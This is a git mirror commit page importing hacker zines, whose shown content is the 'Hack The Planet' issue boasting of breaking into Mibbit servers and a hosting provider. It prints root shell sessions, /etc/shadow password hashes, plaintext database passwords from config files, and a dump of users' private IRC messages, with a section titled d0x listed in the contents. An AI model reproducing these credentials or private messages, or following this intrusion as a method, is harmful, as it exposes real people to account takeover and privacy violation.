Mirrors
/
Zines
mirror of https://github.com/fdiskyou/Zines.git
1
0
Fork 0
Code Issues Releases Wiki Activity

1st import into tree

This commit is contained in:
Rui Reis 2016-12-14 20:40:02 +00:00
parent 340df9dd28
commit c5cb7129ca
32 changed files with 101137 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

BIN
HITB/HITB-Ezine-Issue-001.pdf Normal file
View File

Binary file not shown.

BIN
HITB/HITB-Ezine-Issue-002.pdf Normal file
View File

Binary file not shown.

BIN
HITB/HITB-Ezine-Issue-003.pdf Normal file
View File

Binary file not shown.

BIN
HITB/HITB-Ezine-Issue-004.pdf Normal file
View File

Binary file not shown.

13899
h0no/h0no 2.txt Normal file
View File

File diff suppressed because it is too large Load Diff

13794
h0no/h0no 3.txt Normal file
View File

File diff suppressed because it is too large Load Diff

14416
h0no/h0no.txt Normal file
View File

File diff suppressed because it is too large Load Diff

747
htp/HTP-2.txt Normal file
View File

@ -0,0 +1,747 @@
HACK THE PLANET
:: Table of Contents ::
0x01 ~ Preface
0x02 ~ tools.mibbit.com
- 0x03 ~ PM logs
0x04 ~ status.mibbit.com
0x05 ~ sidewinder.netonecom.net
0x06 ~ d0x
0x07 ~ exit
:: 0x01 - Preface ::
You may have read the about the various attention-whoring skid injections of LulzSec in the news lately, who hasn't?
Apparently, anyone can pick up Havij, LFImap, or LOIC and make media headlines today. It seems they have succeeded in
defacing the name of the anti-sec movement, turning it into a faux-revolutionary battle cry in the form of #antisec.
However, anti-sec is not what it is being portrayed as. In actuality, anti-sec is the practice of keeping one's
exploits and hacks to oneself for the good of everyone else (or personal profit, depending on who you ask). LulzSec, I
would throw in a note here, but it seems I'm too late, most of you are already raided. To the rest, make your time.
Not on the front page of the latest hacking busts and takedowns, the more skilled among us know not to broadcast our
various 0wnages. We silently slip in and sift through large networks. Releases are private. Obviously, when you have a
group that comes along such as Lulzsec, the question is not what they will get into, but how long they will last.
More importantly, I would like to establish that the former Scene has very nearly disappeared since the rise of groups
like Lulzsec. Blindly exploiting and staging large scale unjustified attacks against arbitrary organizations is not the
mentality of hacking. Hacking is about curiousity. Hacking is about information. Attacking government entities so you
can give the media your devoid justice statement is not hacking. It's called bullshit. I've seen enough garbage from
Lulzsec releases.
Today, we would like to provide the community with a special release, exclusively for all of the skidiots on Mibbit
fueling Lulzsec/#antisec efforts. Enjoy.
- HTP
targ3t:
- Mibbit
0wn3d:
- Axod Azander Havvy
- Hercule Joshua Kitsune
- Molkmin Pottsi Sindacious
:: 0x02 - 0wnage - tools.mibbit.com ::
[h () ck ~]$ ssh root () tools mibbit com
root () tools mibbit com's password:
Last login: Fri Aug 12 23:16:22 2011 from [redacted]
root () tools:~# uname -a
Linux tools.mibbit.com 2.6.32.16-linode28 #1 SMP Sun Jul 25 21:32:42 UTC 2010 i686 GNU/Linux
root () tools:~# cat /etc/passwd /etc/shadow
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
ntp:x:102:104::/home/ntp:/bin/false
sshd:x:103:65534::/var/run/sshd:/usr/sbin/nologin
wwwadmin:x:1000:1000::/home/wwwadmin:/bin/bash
mysql:x:104:106:MySQL Server,,,:/var/lib/mysql:/bin/false
Debian-exim:x:105:107::/var/spool/exim4:/bin/false
root:$1$6793e8d9$aGW9MH6RaZmSP4Tncpwrb1:14728:0:99999:7:::
daemon:*:14728:0:99999:7:::
bin:*:14728:0:99999:7:::
sys:*:14728:0:99999:7:::
sync:*:14728:0:99999:7:::
games:*:14728:0:99999:7:::
man:*:14728:0:99999:7:::
lp:*:14728:0:99999:7:::
mail:*:14728:0:99999:7:::
news:*:14728:0:99999:7:::
uucp:*:14728:0:99999:7:::
proxy:*:14728:0:99999:7:::
www-data:*:14728:0:99999:7:::
backup:*:14728:0:99999:7:::
list:*:14728:0:99999:7:::
irc:*:14728:0:99999:7:::
gnats:*:14728:0:99999:7:::
nobody:*:14728:0:99999:7:::
libuuid:!:14728:0:99999:7:::
syslog:*:14728:0:99999:7:::
ntp:*:14728:0:99999:7:::
sshd:*:14728:0:99999:7:::
wwwadmin:$6$.EejimbY$xKAXfpd3nBlNeoQ6pBWBqh673jW2ytSmL5WoUkXaRxadV/fUIM2nQcxm1mGzk1YI9t3yQH8XMzpzSHpNv1jb00:15048:0:99999:7:::
mysql:!:15048:0:99999:7:::
Debian-exim:!:15075:0:99999:7:::
root () tools:~# ps aux | grep log
root 201 0.0 0.0 0 0 ? S Mar15 0:00 [xfslogd/0]
root 202 0.0 0.0 0 0 ? S Mar15 0:00 [xfslogd/1]
root 203 0.0 0.0 0 0 ? S Mar15 0:00 [xfslogd/2]
root 204 0.0 0.0 0 0 ? S Mar15 0:00 [xfslogd/3]
syslog 9019 0.0 0.2 21200 1288 ? Sl Mar15 1:35 rsyslogd -c4
wwwadmin 18565 0.0 0.6 5056 3360 ? S Mar31 22:01 /home/wwwadmin/loggerbot/eggdrop ./logger1
root () tools:~# ls -al /
total 96
drwxr-xr-x 22 root root 4096 Mar 15 22:22 .
drwxr-xr-x 22 root root 4096 Mar 15 22:22 ..
drwxrwxrwx 20 root root 4096 Aug 6 23:14 OLD_DATA
drwxr-xr-x 2 root root 4096 Mar 15 12:19 bin
drwxr-xr-x 2 root root 4096 Apr 29 2010 boot
drwxr-xr-x 11 root root 13640 Mar 15 12:20 dev
drwxr-xr-x 76 root root 4096 Aug 13 01:26 etc
drwxr-xr-x 3 root root 4096 Mar 15 12:31 home
drwxr-xr-x 17 root root 12288 Aug 9 00:38 lib
drwx------ 2 root root 16384 Apr 29 2010 lost+found
drwxr-xr-x 2 root root 4096 Apr 29 2010 media
drwxr-xr-x 2 root root 4096 Apr 23 2010 mnt
drwxr-xr-x 2 root root 4096 Apr 29 2010 opt
dr-xr-xr-x 117 root root 0 Mar 15 12:04 proc
drwx------ 4 root root 4096 Aug 13 02:32 root
drwxr-xr-x 2 root root 4096 Mar 15 12:20 sbin
drwxr-xr-x 2 root root 4096 Dec 5 2009 selinux
drwxr-xr-x 2 root root 4096 Apr 29 2010 srv
drwxr-xr-x 12 root root 0 Mar 15 12:04 sys
drwxrwxrwt 4 root root 4096 Aug 12 08:40 tmp
drwxr-xr-x 11 root root 4096 Aug 9 00:44 usr
drwxr-xr-x 15 root root 4096 Aug 9 00:44 var
root () tools:~# ls -al /home
total 12
drwxr-xr-x 3 root root 4096 Mar 15 12:31 .
drwxr-xr-x 22 root root 4096 Mar 15 22:22 ..
drwxr-xr-x 7 wwwadmin wwwadmin 4096 Aug 12 16:13 wwwadmin
root () tools:~# ls -al /home/wwwadmin
total 1076
drwxr-xr-x 7 wwwadmin wwwadmin 4096 Aug 12 16:13 .
drwxr-xr-x 3 root root 4096 Mar 15 12:31 ..
-rw-r--r-- 1 wwwadmin wwwadmin 5014 Aug 7 20:51 .bash_history
-rw-r--r-- 1 wwwadmin wwwadmin 220 Apr 19 2010 .bash_logout
-rw-r--r-- 1 wwwadmin wwwadmin 3136 Aug 7 17:39 .bashrc
drwx------ 2 wwwadmin wwwadmin 4096 Mar 15 20:10 .cache
-rw-r--r-- 1 wwwadmin wwwadmin 19 Jan 29 2009 .hercpw
-rw-r--r-- 1 wwwadmin wwwadmin 148 Apr 11 2010 .htpasswd
-rw------- 1 wwwadmin wwwadmin 177 Aug 6 15:34 .lesshst
-rw------- 1 wwwadmin wwwadmin 214 Mar 16 20:20 .mysql_history
-rw------- 1 wwwadmin wwwadmin 55 Mar 16 18:19 .php_history
-rw-r--r-- 1 wwwadmin wwwadmin 700 Mar 15 20:55 .profile
-rw-r--r-- 1 wwwadmin wwwadmin 66 Mar 31 16:37 .selected_editor
drwx------ 2 wwwadmin wwwadmin 4096 Mar 15 20:53 .ssh
drwxr-xr-x 2 wwwadmin wwwadmin 4096 Mar 15 21:20 .vim
-rw------- 1 wwwadmin wwwadmin 13346 Aug 12 16:13 .viminfo
-rw-r--r-- 1 wwwadmin wwwadmin 4425 Mar 15 20:53 .vimrc
-rw-r--r-- 1 wwwadmin wwwadmin 993262 Mar 31 14:46 eggdrop1.6.20.tar.bz2
drwxr-xr-x 6 wwwadmin wwwadmin 4096 Apr 16 15:01 kenneth
drwxr-xr-x 10 wwwadmin wwwadmin 4096 Aug 13 02:00 loggerbot
-rw-r--r-- 1 wwwadmin wwwadmin 45 Apr 5 20:40 test.php
root () tools:~# ls -al /OLD_DATA
total 132
drwxrwxrwx 20 root root 4096 Aug 6 23:14 .
drwxr-xr-x 22 root root 4096 Mar 15 22:22 ..
drwxr-xr-x 2 root root 4096 Mar 15 10:46 bin
drwxr-xr-x 2 root root 4096 Oct 20 2008 boot
drwxr-xr-x 4 root root 8192 Mar 15 09:49 dev
drwxr-xr-x 76 root root 4096 Mar 15 10:46 etc
drwxr-xr-x 5 root root 4096 Jan 12 2009 home
drwxr-xr-x 12 root root 8192 Mar 15 10:46 lib
drwx------ 2 root root 16384 Nov 25 2008 lost+found
drwxr-xr-x 2 root root 4096 Nov 25 2008 media
drwxr-xr-x 2 root root 4096 Oct 20 2008 mnt
drwxr-xr-x 2 root root 4096 Nov 25 2008 opt
drwxr-xr-x 2 root root 4096 Oct 20 2008 proc
drwxr-xr-x 3 root root 4096 Mar 7 22:29 root
drwxr-xr-x 2 root root 4096 Mar 15 10:46 sbin
-rw------- 1 root root 31903 Jan 12 2009 sql0swW3A
drwxr-xr-x 2 root root 4096 Nov 25 2008 srv
drwxr-xr-x 2 root root 4096 Oct 14 2008 sys
drwxrwxrwt 4 root root 4096 Mar 15 09:49 tmp
drwxr-xr-x 11 root root 4096 Dec 9 2008 usr
drwxr-xr-x 15 root root 4096 Dec 17 2008 var
root () tools:~# ls -al /OLD_DATA/home
total 20
drwxr-xr-x 5 root root 4096 Jan 12 2009 .
drwxrwxrwx 20 root root 4096 Aug 6 23:14 ..
drwxr-xr-x 13 1001 1001 4096 Mar 15 10:46 ircadmin
drwxr-xr-x 4 wwwadmin wwwadmin 4096 Oct 12 2009 mibbit
drwxr-xr-x 8 1002 1002 4096 Mar 15 09:29 wwwadmin
root () tools:~# ls -al /OLD_DATA/home/ircadmin/ # ALL YOUR IRCD ARE BELONG TO US
total 146816
drwxr-xr-x 13 1001 1001 4096 Mar 15 10:46 .
drwxr-xr-x 5 root root 4096 Jan 12 2009 ..
-rw------- 1 1001 1001 14707 Mar 14 23:29 .bash_history
-rw-r--r-- 1 1001 1001 220 May 12 2008 .bash_logout
-rw-r--r-- 1 1001 1001 3115 May 12 2008 .bashrc
-rw------- 1 1001 1001 41 Jun 1 2010 .lesshst
-rw------- 1 1001 1001 256 Mar 12 14:44 .nano_history
-rw-r--r-- 1 1001 1001 675 May 12 2008 .profile
drwxr-xr-x 2 1001 1001 4096 Mar 7 23:44 .ssh
-rw------- 1 1001 1001 821 May 21 2009 .viminfo
drwxr-xr-x 13 1001 1001 4096 Jan 5 2010 Unreal3.2.7
drwx------ 13 1001 1001 4096 Apr 13 2009 Unreal3.2.8
drwx------ 13 1001 1001 4096 Dec 22 2010 Unreal3.2.8.1
-rw-r--r-- 1 1001 1001 8181760 Sep 9 2009 Unreal3.2.8.1.tar
-rw-r--r-- 1 1001 1001 8181760 Apr 7 2009 Unreal3.2.8.tar
drwxr-xr-x 7 1001 1001 4096 Feb 3 2009 anope-1.8.0-rc1
drwxr-xr-x 8 1001 1001 4096 Jan 7 2009 bopm
drwxr-xr-x 5 1001 1001 4096 Jan 7 2009 bopm-3.1.3
-rw------- 1 1001 1001 1475 Jul 30 2009 dead.letter
drwxr-xr-x 2 1001 1001 8192 Mar 12 14:44 dronebl
drwxr-xr-x 3 1001 1001 4096 May 4 2009 hub
drwxr-xr-x 9 1001 1001 4096 Mar 15 10:46 infobot-0.45.3
-rw-r--r-- 1 1001 1001 81 Jan 26 2010 irc.us.mibbit.net.txt
-rw-r--r-- 1 1001 1001 132744770 Feb 28 2010 ircd.tgz
-rw-r--r-- 1 1001 1001 623 Oct 27 2009 jim
-rw------- 1 1001 1001 949701 Feb 8 2010 mbox
drwxr-xr-x 7 1001 1001 4096 Jan 26 2010 services
:: 0x03 - PM logs - tools.mibbit.com ::
root () tools:~# mysql -u root -ped4e5c6e88e5
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 95641
Server version: 5.1.41-3ubuntu12.10 (Ubuntu)
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
mysql> use www;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
mysql> select concat(fromNick,' -> ',toNick,': ',data) from pmlogs;
jared -> molkmin: can the admins tell when users PM each other on this network?
jared -> molkmin: (with mibbit)
molkmin -> jared: who do you wnat to know is saying what?
jared -> molkmin: but they don't have to know that :)
karma motherfuck3r
molkmin -> alpha: not that I can see
molkmin -> alpha: I wasn't watching
molkmin -> alpha: it hardly matters :)
alpha -> molkmin: just silenced them
alpha -> molkmin: :)
molkmin -> alpha: everyone in #chat is assholes :)
alpha -> molkmin: lol
alpha -> molkmin: thanks
thX
jared -> molkmin: i've seen some scary botnets on dalnet
jared -> molkmin: they could knock you off the server in less than a second
molkmin -> jared: I've never had that happen yet
molkmin -> jared: I have a mac
??
jared -> molkmin: VNCing into a linux box
jared -> molkmin: with a windows virtualbox guest
jared -> molkmin: to use the VPN
jared -> molkmin: to connect to a terminal server at work
jared -> molkmin: friggin ridiculous
molkmin -> jared: get a freaking mac
jared -> molkmin: how would that help?
...
[h () ck ~]$ wc mibbitpms.out
51610 493903 2955301 mibbitpms.out
[h () ck ~]$ wc mibbitchanmsgs.out
622607 4558597 32539145 mibbitchanmsgs.out
f1les @ 0x07 <<<
:: 0x04 - status.mibbit.com ::
[h () ck ~]$ ssh wwwadmin () status mibbit com
wwwadmin () status mibbit com's password:
Last login: Fri Aug 12 21:18:51 2011 from [redacted]
wwwadmin () status:~$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
sshd:x:101:65534::/var/run/sshd:/usr/sbin/nologin
syslog:x:102:103::/home/syslog:/bin/false
klog:x:103:104::/home/klog:/bin/false
mysql:x:104:105:MySQL Server,,,:/var/lib/mysql:/bin/false
mibbit:x:1000:1000::/home/mibbit:/bin/bash
wwwadmin:x:1001:1001::/home/wwwadmin:/bin/bash
zfreebies:x:1002:1002::/home/zfreebies:/bin/bash
smmta:x:105:107:Mail Transfer Agent,,,:/var/lib/sendmail:/bin/false
smmsp:x:106:108:Mail Submission Program,,,:/var/lib/sendmail:/bin/false
jimmy:x:1003:1003::/home/jimmy:/bin/bash
bind:x:107:109::/var/cache/bind:/bin/false
wwwadmin () status:~$ ls -alt /
total 92
drwxrwxrwt 4 root root 4096 Aug 13 07:25 tmp
drwxr-xr-x 78 root root 4096 Aug 13 01:14 etc
drwxr-xr-x 21 root root 4096 Jul 7 07:40 .
drwxr-xr-x 21 root root 4096 Jul 7 07:40 ..
drwxr-xr-x 11 root root 12760 Jul 7 07:40 dev
drwxr-xr-x 11 root root 0 Jul 7 07:40 sys
dr-xr-xr-x 99 root root 0 Jul 7 07:40 proc
drwxr-xr-x 2 root root 4096 May 29 23:11 bin
drwxr-xr-x 15 root root 12288 May 29 23:11 lib
drwx------ 3 root root 4096 May 29 23:11 root
drwxr-xr-x 2 root root 4096 Nov 6 2010 sbin
drwxr-xr-x 6 root root 4096 Mar 4 2010 home
drwxr-xr-x 11 root root 4096 Sep 30 2009 usr
drwxr-xr-x 14 root root 4096 Aug 11 2009 var
drwxr-xr-x 2 root root 4096 Apr 23 2009 media
drwxr-xr-x 2 root root 4096 Apr 23 2009 opt
drwxr-xr-x 2 root root 4096 Apr 23 2009 srv
drwx------ 2 root root 16384 Apr 23 2009 lost+found
drwxr-xr-x 2 root root 4096 Apr 13 2009 boot
drwxr-xr-x 2 root root 4096 Apr 13 2009 mnt
drwxr-xr-x 2 root root 4096 Mar 6 2009 selinux
wwwadmin () status:~$ ls -alt /home
total 24
drwxr-xr-x 6 wwwadmin wwwadmin 4096 Aug 12 21:44 wwwadmin
drwxr-xr-x 21 root root 4096 Jul 7 07:40 ..
drwxr-xr-x 7 mibbit mibbit 4096 Jun 29 13:30 mibbit
drwxr-xr-x 4 zfreebies zfreebies 4096 Apr 29 2010 zfreebies
drwxr-xr-x 3 jimmy jimmy 4096 Mar 8 2010 jimmy
drwxr-xr-x 6 root root 4096 Mar 4 2010 .
wwwadmin () status:~$ ls -alt
total 52
drwxr-xr-x 6 wwwadmin wwwadmin 4096 Aug 12 21:44 .
-rw------- 1 wwwadmin wwwadmin 1979 Aug 12 21:44 .mysql_history
-rw------- 1 wwwadmin wwwadmin 120 Aug 12 05:15 .nano_history
drwxrwxrwx 2 wwwadmin wwwadmin 4096 Aug 7 18:29 .ssh
-rw------- 1 wwwadmin wwwadmin 6566 Aug 7 15:02 .bash_history
drwxr-xr-x 3 wwwadmin wwwadmin 4096 Jan 26 2011 wiki_new
drwxr-xr-x 4 wwwadmin wwwadmin 4096 Jan 25 2011 wiki_backup_25Jan
lrwxrwxrwx 1 root root 31 Jan 17 2011 blog -> /var/www/blog.mibbit.com/htdocs
drwxr-xr-x 2 wwwadmin wwwadmin 4096 Dec 10 2010 WP_BACKUP
drwxr-xr-x 6 root root 4096 Mar 4 2010 ..
lrwxrwxrwx 1 wwwadmin wwwadmin 32 Sep 13 2009 wiki -> /var/www/wiki.mibbit.com/htdocs/
-rw-r--r-- 1 wwwadmin wwwadmin 220 Mar 2 2009 .bash_logout
-rw-r--r-- 1 wwwadmin wwwadmin 3115 Mar 2 2009 .bashrc
-rw-r--r-- 1 wwwadmin wwwadmin 675 Mar 2 2009 .profile
wwwadmin () status:~$ ls -alt /var/www/
total 56
drwxr-xr-x 4 root root 4096 May 12 2010 www.stopitmovies.com
drwxr-xr-x 13 root root 4096 May 12 2010 .
drwxr-xr-x 4 root root 4096 Mar 24 2010 status.mibbit.com
drwxr-xr-x 4 root root 4096 Mar 16 2010 a.mibbit.com
drwxr-xr-x 6 root root 4096 Feb 19 2010 blog.mibbit.com
drwxr-xr-x 4 root root 4096 Dec 23 2009 adminwiki.mibbit.com
drwxr-xr-x 4 root root 4096 Oct 12 2009 www.rollered.com
drwxr-xr-x 4 root root 4096 Oct 12 2009 www.wizzig.com
drwxr-xr-x 4 www-data www-data 4096 Oct 12 2009 www.axod.net
drwxr-xr-x 5 root root 4096 Sep 30 2009 www.zfreebies.com
drwxr-xr-x 5 root root 4096 Sep 15 2009 forum.zfreebies.co.uk
drwxrwxr-x 5 www-data www-data 4096 Sep 13 2009 wiki.mibbit.com
-rw-r--r-- 1 root root 45 Aug 11 2009 index.html
drwxr-xr-x 14 root root 4096 Aug 11 2009 ..
wwwadmin () status:~$ cat /var/www/a.mibbit.com/htdocs/admin/index.php | head -n 3
<?
$sql = @mysql_connect("127.0.0.1", "advertuser", "e5e32f36aa88");
@mysql_select_db("adverts", $sql);
wwwadmin () status:~$ cat /var/www/a.mibbit.com/htdocs/sessionError.php | head -n 3
<?
$sql = @mysql_connect("127.0.0.1", "root", "5068c8055ffc");
wwwadmin () status:~$ ls -alt /var/www/blog.mibbit.com/htdocs
total 308
drwxr-xr-x 5 wwwadmin wwwadmin 4096 Nov 15 2010 .
-rw-r--r-- 1 wwwadmin www-data 655 Nov 15 2010 favicon.ico
drwxr-xr-x 5 wwwadmin www-data 4096 Feb 23 2010 wp-content
-rw-r--r-- 1 wwwadmin www-data 1548 Feb 19 2010 wp-config.php
-rw-r--r-- 1 wwwadmin www-data 93445 Feb 19 2010 xmlrpc.php
-rw-r--r-- 1 wwwadmin www-data 23097 Feb 19 2010 wp-settings.php
-rw-r--r-- 1 wwwadmin www-data 3693 Feb 19 2010 wp-trackback.php
-rw-r--r-- 1 wwwadmin www-data 218 Feb 19 2010 wp-rss.php
-rw-r--r-- 1 wwwadmin www-data 220 Feb 19 2010 wp-rss2.php
-rw-r--r-- 1 wwwadmin www-data 7578 Feb 19 2010 wp-mail.php
-rw-r--r-- 1 wwwadmin www-data 487 Feb 19 2010 wp-pass.php
-rw-r--r-- 1 wwwadmin www-data 218 Feb 19 2010 wp-rdf.php
-rw-r--r-- 1 wwwadmin www-data 316 Feb 19 2010 wp-register.php
-rw-r--r-- 1 wwwadmin www-data 2341 Feb 19 2010 wp-load.php
-rw-r--r-- 1 wwwadmin www-data 22721 Feb 19 2010 wp-login.php
drwxr-xr-x 6 wwwadmin www-data 4096 Feb 19 2010 wp-includes
-rw-r--r-- 1 wwwadmin www-data 1946 Feb 19 2010 wp-links-opml.php
-rw-r--r-- 1 wwwadmin www-data 220 Feb 19 2010 wp-feed.php
-rw-r--r-- 1 wwwadmin www-data 1253 Feb 19 2010 wp-cron.php
-rw-r--r-- 1 wwwadmin www-data 238 Feb 19 2010 wp-commentsrss2.php
-rw-r--r-- 1 wwwadmin www-data 2616 Feb 19 2010 wp-config-sample.php
-rw-r--r-- 1 wwwadmin www-data 40400 Feb 19 2010 wp-app.php
-rw-r--r-- 1 wwwadmin www-data 220 Feb 19 2010 wp-atom.php
-rw-r--r-- 1 wwwadmin www-data 274 Feb 19 2010 wp-blog-header.php
-rw-r--r-- 1 wwwadmin www-data 3928 Feb 19 2010 wp-comments-post.php
drwxr-xr-x 8 wwwadmin www-data 4096 Feb 19 2010 wp-admin
-rw-r--r-- 1 wwwadmin www-data 15410 Feb 19 2010 license.txt
-rw-r--r-- 1 wwwadmin www-data 7644 Feb 19 2010 readme.html
-rw-r--r-- 1 wwwadmin www-data 397 Feb 19 2010 index.php
drwxr-xr-x 6 root root 4096 Feb 19 2010 ..
wwwadmin () status:~$ cat /var/www/blog.mibbit.com/htdocs/wp-config.php | head -n 8
<?php
// ** MySQL settings ** //
define('DB_NAME', 'wpblog'); // The name of the database
define('DB_USER', 'wpuser'); // Your MySQL username
define('DB_PASSWORD', '13c3cada3921'); // ...and password
define('DB_HOST', 'localhost'); // 99% chance you won't need to change this value
define('DB_CHARSET', 'utf8');
define('DB_COLLATE', '');
wwwadmin () status:~$ ls -alt /var/www/wiki.mibbit.com/htdocs/
total 720
-rw-rw-r-- 1 www-data www-data 6960 Mar 21 12:46 LocalSettings.php
drwxrwxr-x 9 www-data www-data 4096 Mar 21 12:41 extensions
drwxr-xr-x 2 wwwadmin wwwadmin 4096 Jan 26 2011 SpamBlacklist
drwxrwxr-x 17 www-data www-data 4096 Jan 26 2011 .
drwxrwxr-x 22 www-data www-data 4096 Jan 26 2011 images
drwxrwxr-x 2 www-data www-data 4096 Jan 26 2011 bin
drwxrwxr-x 2 www-data www-data 4096 Jan 26 2011 config
drwxrwxr-x 4 www-data www-data 4096 Jan 26 2011 docs
drwxrwxr-x 17 www-data www-data 4096 Jan 26 2011 includes
drwxrwxr-x 4 www-data www-data 4096 Jan 26 2011 languages
drwxrwxr-x 13 www-data www-data 12288 Jan 26 2011 maintenance
drwxrwxr-x 2 www-data www-data 4096 Jan 26 2011 math
drwxrwxr-x 2 www-data www-data 4096 Jan 26 2011 serialized
drwxrwxr-x 10 www-data www-data 4096 Jan 26 2011 skins
drwxr-xr-x 2 wwwadmin wwwadmin 4096 Jan 4 2011 cache
-rw-r--r-- 1 wwwadmin wwwadmin 59433 Jan 4 2011 RELEASE-NOTES
-rw-r--r-- 1 wwwadmin wwwadmin 2090 Jan 4 2011 CREDITS
-rw-r--r-- 1 wwwadmin wwwadmin 8821 Jan 4 2011 profileinfo.php
-rw-rw-r-- 1 root root 655 Nov 15 2010 favicon.ico
-rw-r--r-- 1 wwwadmin wwwadmin 13307 Mar 25 2010 UPGRADE
-rw-r--r-- 1 wwwadmin wwwadmin 392287 Mar 12 2010 HISTORY
-rw-r--r-- 1 wwwadmin wwwadmin 4905 Mar 8 2010 thumb.php
-rw-r--r-- 1 wwwadmin wwwadmin 4707 Feb 15 2010 api.php
-rw-r--r-- 1 wwwadmin wwwadmin 174 Feb 3 2010 php5.php5
-rw-r--r-- 1 wwwadmin wwwadmin 89 Feb 3 2010 redirect.phtml
-rw-r--r-- 1 wwwadmin wwwadmin 86 Feb 3 2010 wiki.phtml
-rw-r--r-- 1 wwwadmin wwwadmin 4329 Jan 1 2010 index.php
-rw-r--r-- 1 wwwadmin wwwadmin 4031 Oct 14 2009 img_auth.php
-rw-rw-r-- 1 www-data www-data 9416 Sep 13 2009 mibbit.png
-rw-rw-r-- 1 www-data www-data 1049 Sep 13 2009 AdminSettings.php
drwxrwxr-x 5 www-data www-data 4096 Sep 13 2009 ..
-rw-r--r-- 1 wwwadmin wwwadmin 76 Jul 27 2009 FAQ
drwxrwxr-x 4 www-data www-data 4096 Jul 13 2009 t
drwxrwxr-x 2 www-data www-data 4096 Jul 13 2009 tests
-rw-r--r-- 1 wwwadmin wwwadmin 648 May 7 2009 StartProfiler.sample
-rw-rw-r-- 1 www-data www-data 3952 Mar 21 2009 install-utils.inc
-rw-r--r-- 1 wwwadmin wwwadmin 3054 Mar 21 2009 opensearch_desc.php
-rw-r--r-- 1 wwwadmin wwwadmin 383 Mar 21 2009 redirect.php
-rw-r--r-- 1 wwwadmin wwwadmin 32 Mar 16 2009 trackback.php5
-rw-rw-r-- 1 www-data www-data 603 Jan 7 2009 StartProfiler.php
-rw-r--r-- 1 wwwadmin wwwadmin 3649 Nov 11 2008 README
-rw-r--r-- 1 wwwadmin wwwadmin 1347 Nov 5 2008 trackback.php
-rw-r--r-- 1 wwwadmin wwwadmin 4138 Apr 18 2008 INSTALL
-rw-rw-r-- 1 www-data www-data 618 Apr 11 2008 Makefile
-rw-r--r-- 1 wwwadmin wwwadmin 39 Mar 3 2008 opensearch_desc.php5
-rw-r--r-- 1 wwwadmin wwwadmin 25 Feb 4 2008 api.php5
-rw-r--r-- 1 wwwadmin wwwadmin 31 Feb 4 2008 img_auth.php5
-rw-r--r-- 1 wwwadmin wwwadmin 28 Feb 4 2008 index.php5
-rw-r--r-- 1 wwwadmin wwwadmin 31 Feb 4 2008 redirect.php5
-rw-r--r-- 1 wwwadmin wwwadmin 29 Feb 4 2008 thumb.php5
-rw-r--r-- 1 wwwadmin wwwadmin 17997 Apr 5 2006 COPYING
wwwadmin () status:~$ cat /var/www/wiki.mibbit.com/htdocs/LocalSettings.php | grep "password" -C 5
$wgDBtype = "mysql";
$wgDBserver = "localhost";
$wgDBname = "wikidb";
$wgDBuser = "wikiuser";
$wgDBpassword = "a69e74574db6";
$wgDBport = "5432";
$wgDBprefix = "";
$wgDBadminuser = "wikiuser";
$wgDBadminpassword = "a69e74574db6";
# Schemas for Postgres
$wgDBmwschema = "mediawiki";
$wgDBts2schema = "public";
wwwadmin () status:~$ cat /var/www/adminwiki.mibbit.com/htdocs/LocalSettings.php | grep "password" -C 5
## Database settings
$wgDBtype = "mysql";
$wgDBserver = "localhost";
$wgDBname = "wikiadmindb";
$wgDBuser = "wikiadminuser";
$wgDBpassword = "fe102b0d7793";
# MySQL specific settings
$wgDBprefix = "";
# MySQL table options to use during installation or update
wwwadmin () status:~$ exit
Connection to status.mibbit.com closed.
:: 0x05 - sidewinder.netonecom.net ::
backup () sidewinder ~> ls -al # read world backups of all servers with /etc/shadow ROFL
total 596
drwxr-xr-x 16 backup root 432 2011-08-12 18:52 .
drwxr-xr-x 26 root root 632 2011-05-12 14:12 ..
drwxr-xr-x 2 backup users 1344 2009-08-27 10:44 amram
drwxr-xr-x 2 root root 587920 2011-08-13 12:37 awstats
-rw------- 1 backup 1452 17 2006-09-18 14:47 .bash_history
drwxr-xr-x 2 backup users 224 2009-10-07 12:58 hornet
drwxr-xr-x 2 backup users 1336 2010-08-24 11:23 ice
drwxr-xr-x 2 backup users 1216 2010-11-12 16:07 janco
drwxr-xr-x 3 backup users 264 2011-08-13 01:27 magic
drwxr-xr-x 3 backup users 1416 2011-07-26 12:32 merlin
drwxr-xr-x 2 backup users 1432 2011-05-16 05:55 multimag
